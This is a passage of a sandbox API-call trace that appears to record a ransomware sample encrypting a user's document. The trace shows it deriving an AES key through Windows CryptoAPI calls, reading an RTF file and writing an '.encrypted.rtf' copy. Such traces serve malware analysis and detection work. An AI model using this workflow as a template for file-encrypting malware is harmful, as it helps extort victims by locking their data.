dwCmpFlags=0x1, lpString1="Documents\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZHze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Hze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ze0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VCkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CkEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kEbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EbN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bN69.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.236] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.236] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0033.236] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0033.236] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.236] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.236] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.236] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.236] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.236] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.236] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fa86ae0, ftCreationTime.dwHighDateTime=0x1d5c189, ftLastAccessTime.dwLowDateTime=0x4ca0c60, ftLastAccessTime.dwHighDateTime=0x1d5c073, ftLastWriteTime.dwLowDateTime=0x4ca0c60, ftLastWriteTime.dwHighDateTime=0x1d5c073, nFileSizeHigh=0x0, nFileSizeLow=0x5198, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="J7ZHze0f-VCkEbN69.rtf", cAlternateFileName="J7ZHZE~1.RTF")) returned 0x7c2240 [0033.236] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0033.236] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0033.236] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.236] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0033.237] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0033.237] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.237] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.237] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0033.238] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0033.238] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0033.238] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0033.238] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0033.238] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.238] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0033.238] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.238] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0033.238] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.238] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0033.238] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0033.238] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.238] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.238] CryptHashData (hHash=0x7c2100, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0033.238] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.238] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0033.238] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.238] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0033.238] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.238] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.238] CryptDestroyHash (hHash=0x7c2100) returned 1 [0033.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0033.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0033.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0033.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0033.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0033.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0033.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0033.239] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\j7zhze0f-vckebn69.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0033.239] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.239] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0033.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0033.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0033.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0033.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0033.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0033.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0033.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0033.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0033.239] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0033.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0033.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0033.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0033.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0033.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0033.239] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0033.239] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0033.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0033.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0033.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0033.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0033.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0033.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0033.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0033.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0033.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0033.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0033.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0033.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0033.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0033.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0033.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0033.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0033.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0033.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0033.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0033.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0033.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0033.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0033.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0033.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0033.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0033.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0033.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0033.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0033.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0033.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0033.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0033.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0033.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0033.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0033.241] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0033.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0033.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0033.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0033.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0033.241] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0033.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0033.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0033.241] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0033.241] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\J7ZHze0f-VCkEbN69.encrypted.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\j7zhze0f-vckebn69.encrypted.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0033.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0033.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0033.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0033.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0033.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0033.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0033.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0033.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0033.242] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0033.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0033.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0033.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0033.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0033.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0033.242] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0033.242] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0033.242] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0033.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0033.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0033.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.242] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0033.242] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.243] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0033.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0033.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0033.243] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0033.243] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0033.243] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x5198, lpOverlapped=0x0) returned 1 [0033.244] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0033.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0033.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0033.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.244] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x5198) returned 0x8affc0 [0033.244] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0033.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0033.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0033.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0033.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0033.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0033.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x5198) returned 0x8b5160 [0033.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8affc0 | out: hHeap=0x770000) returned 1 [0033.245] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.245] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.245] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0033.245] 